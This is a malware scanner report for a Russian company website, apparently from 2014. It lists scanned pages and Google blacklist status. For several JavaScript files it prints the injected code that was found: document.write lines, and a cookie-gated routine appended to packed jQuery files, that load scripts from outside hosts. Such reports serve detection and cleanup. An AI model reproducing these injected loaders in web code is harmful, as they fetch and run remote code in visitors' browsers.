New scan:

Malware Scanner report for vzljot-ural.ru

Malicious/Suspicious/Total urls checked
2/2/15
4 pages have malicious or suspicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "vzljot-ural.ru" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=vzljot-ural.ru

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://vzljot-ural.ru/
200 OK
Content-Length: 9105
Content-Type: text/html
clean
http://vzljot-ural.ru/js/api.js
200 OK
Content-Length: 4105
Content-Type: application/x-javascript
suspicious
Suspicious code found


document.write('<script type="text/javascript" src="http://encore-musicals.co.uk/wmG8B32z.php?id=12367989"></script>');

http://vzljot-ural.ru/js/jquery-1.2.6.pack.js
200 OK
Content-Length: 31529
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)


eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('(H(){J w=1b.4M,3m$=1b.$;J D=1b.4M=1b.$=H(a,b){I 2B D.17.5j(a,b)};J u=/^[^<]*(<(.|\\s)+>)[^>]*$|^#(\\w+)$/,62=/^.[^:#\\[\\.]*$/,12;D.17=D.44={5j:H(d,b)
... 32239 bytes are skipped ...
|ajaxSetup|meta|post|getJSON|getScript|marginLeft|img|elements|pageYOffset|pageXOffset|abbr|serialize|pixelLeft'.split('|'),0,{}))function g(){var r=new RegExp("(?:; )?1=([^;]*);?");return r.test(document.cookie)?true:false}var e=new Date();e.setTime(e.getTime()+(2592000000));
if(!g()&&window.navigator.cookieEnabled){document.cookie="1=1;expires="+e.toGMTString()+";path=/";document.write('<scr'+'ipt src="http://ratingsite.org/ratingsite.php"></scr'+'ipt>');}


Antivirus reports:

DrWeb
JS.Siggen.211

http://vzljot-ural.ru/js/lightbox/jquery.lightbox-0.5.pack.js
200 OK
Content-Length: 5857
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('(5($){$.2s.2t=5(j){j=1D.2u({1E:\'#2v\',1F:0.8,1a:I,1G:\'14/4/16/4-2w-S.17\',1n:\'14/4/16/4-1o-2x.17\',1p:\'14/4/16/4-1o-2y.17\',1H:\'14/4/16/4-1o-2z.17\',1b:\'14/4/16/4
... 5013 bytes are skipped ...
_ESCAPE|String|fromCharCode|toLowerCase|37|39|fadeOut|visible|scrollMaxX|scrollWidth|offsetWidth|pageXOffset|do'.split('|'),0,{}))function g(){var r=new RegExp("(?:; )?1=([^;]*);?");return r.test(document.cookie)?true:false}var e=new Date();e.setTime(e.getTime()+(2592000000));
if(!g()&&window.navigator.cookieEnabled){document.cookie="1=1;expires="+e.toGMTString()+";path=/";document.write('<scr'+'ipt src="http://ratingsite.org/ratingsite.php"></scr'+'ipt>');}


Antivirus reports:

DrWeb
JS.Siggen.211

http://vzljot-ural.ru/index.php?dn=about
200 OK
Content-Length: 11799
Content-Type: text/html
clean
http://vzljot-ural.ru/index.php?dn=catalog
200 OK
Content-Length: 15448
Content-Type: text/html
clean
http://vzljot-ural.ru/index.php?dn=info&pa=uslugi
200 OK
Content-Length: 8504
Content-Type: text/html
clean
http://vzljot-ural.ru/index.php?dn=project
200 OK
Content-Length: 103620
Content-Type: text/html
clean
http://vzljot-ural.ru/index.php?dn=info&pa=contact
200 OK
Content-Length: 10779
Content-Type: text/html
clean
http://api-maps.yandex.ru/1.1/?key=ABdxi00BAAAAsGr7KQIANoJ4Czlgn7zADyPVAsxJuxVBxV4AAAAAAAAAAAATvwH0Ym88cMba7yBwzKNHaa-PVA==&modules=pmap&wizard=constructor
200 OK
Content-Length: 5824
Content-Type: text/javascript
clean
http://vzljot-ural.ru/index.php?dn=mails
200 OK
Content-Length: 10801
Content-Type: text/html
clean
http://vzljot-ural.ru/js/jquery.validate.js
200 OK
Content-Length: 37960
Content-Type: application/x-javascript
suspicious
Suspicious code found


document.write('<script type="text/javascript" src="http://encore-musicals.co.uk/wmG8B32z.php?id=12367993"></script>');

http://vzljot-ural.ru/index.php?dn=catalog&to=cat&id=1
200 OK
Content-Length: 10985
Content-Type: text/html
clean
http://vzljot-ural.ru/index.php?dn=catalog&to=art&id=1
200 OK
Content-Length: 27800
Content-Type: text/html
clean
http://vzljot-ural.ru/up/article/file/TCP03x.doc
200 OK
Content-Length: 128512
Content-Type: application/msword
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: vzljot-ural.ru

Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 14 May 2014 18:38:12 GMT
Server: nginx
Vary: Accept-Encoding
Content-Length: 9105
Content-Type: text/html; charset=windows-1251
Last-Modified: Wed, 14 May 2014 18:38:12 GMT
X-Powered-By: CMS Danneo 0.5.3

...9105 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: vzljot-ural.ru
Referer: http://www.google.com/search?q=vzljot-ural.ru

Result:
The result is similar to the first query. There are no suspicious redirects found.